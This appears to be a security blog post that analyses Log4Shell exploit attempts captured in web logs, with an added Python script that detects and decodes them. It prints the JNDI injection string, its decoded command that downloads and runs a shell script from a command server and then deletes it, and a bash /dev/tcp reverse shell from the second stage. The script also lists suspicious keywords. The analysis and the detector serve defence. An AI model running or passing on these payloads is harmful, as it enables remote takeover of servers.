Bad guys continue to attempt to exploit the vulnerability in Log4j known as Log4Shell (CVE-2021-44228).
I have captured the HTTP requests below in web server logs on this site and others:
${jndi:ldap://164.92.110.133:443/Basic/Command/Base64/d2dldCAtbmMgaHR0cDovLzEzLjg5LjQ4LjExOC9hLnNoIC1xIC1QIC90bXAvOyBjaG1vZCA3NzcgL3RtcC9hLnNoOyAvdG1wL2Euc2g7IHJtIC1yZiAvdG1wLyouc2g=}
If the web server were vulnerable, it would execute the Base64-encoded commands. What do these decode to?
wget -nc http://13.89.48.118/a.sh -q -P /tmp/; chmod 777 /tmp/a.sh; /tmp/a.sh; rm -rf /tmp/*.sh
These commands will connect to the C&C server at 13.89.48.118, quietly download the file a.sh into /tmp, make it executable, run it, and then delete every .sh file in /tmp to remove the evidence.
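The following is an added detection example (not part of the original post) that scans access-log lines for the `${jndi:...}` lookup shown above, pulls out the callback host and port, and decodes the `/Basic/Command/Base64/` payload so the dropped command can be triaged without touching the attacker's infrastructure. The log lines are constructed here; the IPs and payload are the ones reported on this page.

```python
import base64
import re
from urllib.parse import unquote

# A JNDI lookup embedded in a request line or header value.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns):/*(?P<host>[^:/}]+):?(?P<port>\d+)?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)
# The exploit-kit convention seen in the captured request: .../Command/Base64/<b64>
B64_CMD_RE = re.compile(r"/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE)
# Substrings in a decoded payload that indicate download-and-execute or reverse-shell behaviour.
SUSPICIOUS = ("wget ", "curl ", "/dev/tcp/", "chmod 777", "nohup ")

def decode_b64_command(path):
    """Return the decoded command from a /Command/Base64/<b64> path, or None."""
    m = B64_CMD_RE.search(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error (bad Base64) is a subclass of ValueError
        return None

def scan_log_line(line):
    """Return a dict describing a Log4Shell attempt in one access-log line, or None."""
    m = JNDI_RE.search(unquote(line))  # payloads are often URL-encoded in logs
    if not m:
        return None
    cmd = decode_b64_command(m.group("path"))
    return {
        "scheme": m.group("scheme").lower(),
        "callback": f"{m.group('host')}:{m.group('port') or '?'}",
        "command": cmd,
        "indicators": [s.strip() for s in SUSPICIOUS if cmd and s in cmd],
    }

def scan_log(lines):
    """Return the hits for every line that carries a JNDI lookup."""
    return [hit for hit in (scan_log_line(line) for line in lines) if hit]

# Constructed sample lines; the first carries the payload quoted in the post above.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /?x=${jndi:ldap://164.92.110.133:443/Basic/Command/Base64/d2dldCAtbmMgaHR0cDovLzEzLjg5LjQ4LjExOC9hLnNoIC1xIC1QIC90bXAvOyBjaG1vZCA3NzcgL3RtcC9hLnNoOyAvdG1wL2Euc2g7IHJtIC1yZiAvdG1wLyouc2g=} HTTP/1.1" 200 512',
    '10.0.0.6 - - [12/Jan/2022:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Real attempts also use nested lookups such as `${${lower:j}ndi:...}` to evade plain string matching, so production detection should normalise those forms before applying a pattern like the one above.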
I have downloaded the a.sh file; it contains further commands:
nohup bash -c '0<&183-;exec 183<>/dev/tcp/164.92.110.133/45982;sh <&183 >&183 2>&183' &1 &
This is an attempt to set up a reverse shell back to the attacker: bash's /dev/tcp pseudo-device opens a TCP connection to 164.92.110.133 on port 45982, and a shell's input, output and errors are redirected over that socket, detached with nohup so it survives the parent exiting.
Patch your stuff!